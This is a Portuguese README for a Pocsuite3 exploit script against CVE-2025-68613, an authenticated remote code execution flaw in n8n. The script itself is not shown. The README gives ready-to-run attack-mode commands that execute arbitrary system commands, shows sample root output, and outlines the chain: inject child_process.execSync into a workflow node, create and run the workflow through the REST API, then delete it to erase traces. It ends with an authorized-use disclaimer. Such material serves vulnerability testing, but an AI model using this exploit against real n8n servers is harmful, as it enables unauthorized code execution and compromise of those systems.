
Script de verificação e exploração de vulnerabilidades baseado no framework Pocsuite3, usado para detectar a vulnerabilidade de execução remota de código (RCE) pós-autenticação na ferramenta de automação de fluxo de trabalho n8n.
CVE ID: CVE-2025-68613
Tipo: Execução Remota de Código Autenticada
Framework: Pocsuite3
Este é um script de verificação e exploração de vulnerabilidades baseado no framework Pocsuite3, usado para detectar a vulnerabilidade de execução remota de código (RCE) pós-autenticação na ferramenta de automação de fluxo de trabalho n8n. O script suporta dois modos: verificação inofensiva (Verify) e execução de comandos (Attack), e possui funcionalidade de limpeza automática de vestígios de teste.
Este script estende os parâmetros base do Pocsuite3 com os seguintes parâmetros personalizados, que devem ser passados via --options durante a execução:
Certifique-se de que o pocsuite3 esteja instalado (pip install pocsuite3) e salve o script como n8n_auth_rce.py.
No modo de verificação, o script envia ao alvo um fluxo de trabalho contendo um cálculo matemático seguro (11111 + 22222). Se o resultado retornado for 33333, isso prova que o motor JS pode ser invocado maliciosamente.
Este modo é inofensivo e não executa comandos do sistema.
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'
Saída esperada:
[+] Vulnerable! JS Expression executed. Result: 33333
O modo de ataque permite executar comandos arbitrários do sistema. Por padrão, executa o comando id, mas você pode personalizar o comando através do parâmetro cmd.
Executar comando padrão (id):
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE"}'
Executar comando personalizado (ex.: whoami):
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'
Saída esperada:
[+] Command 'whoami' executed:
root
O fluxo de execução deste PoC é projetado como uma operação de ciclo fechado, garantindo o mínimo impacto residual no sistema alvo:
n8n-nodes-base.set usando a api_key fornecida.require('child_process').execSync(...)) no campo value do nó.POST para /rest/workflows para criar um fluxo de trabalho temporário e obtém o workflow_id.POST para /rest/workflows/{id}/run para disparar a execução do fluxo de trabalho e analisa o JSON retornado para obter o resultado da execução do comando.DELETE para /rest/workflows/{id} para remover o fluxo de trabalho temporário, mantendo o ambiente limpo.Leia atentamente antes de usar
- Princípio de Autorização: Esta ferramenta deve ser usada apenas por profissionais de segurança cibernética com autorização explícita para realizar testes de segurança ou verificação de vulnerabilidades no sistema alvo.
- Atos Ilegais: É estritamente proibido usar esta ferramenta para qualquer teste de penetração não autorizado, ataques ou fins ilegais.
- Responsabilidade: Quaisquer consequências decorrentes do uso desta ferramenta (incluindo, mas não se limitando a danos ao sistema, perda de dados, disputas legais) são de responsabilidade exclusiva do usuário. Os desenvolvedores e contribuidores não assumem nenhuma responsabilidade legal.
- Conformidade: O usuário deve cumprir as leis e regulamentos locais (como a Lei de Segurança Cibernética da República Popular da China, etc.).
| Parâmetro | Obrigatório | Padrão | Descrição |
|---|
api_key | ✅ | - | X-N8N-API-KEY do alvo (obrigatório para autenticação) |
cmd | ❌ | id | Comando do sistema a ser executado no modo Attack |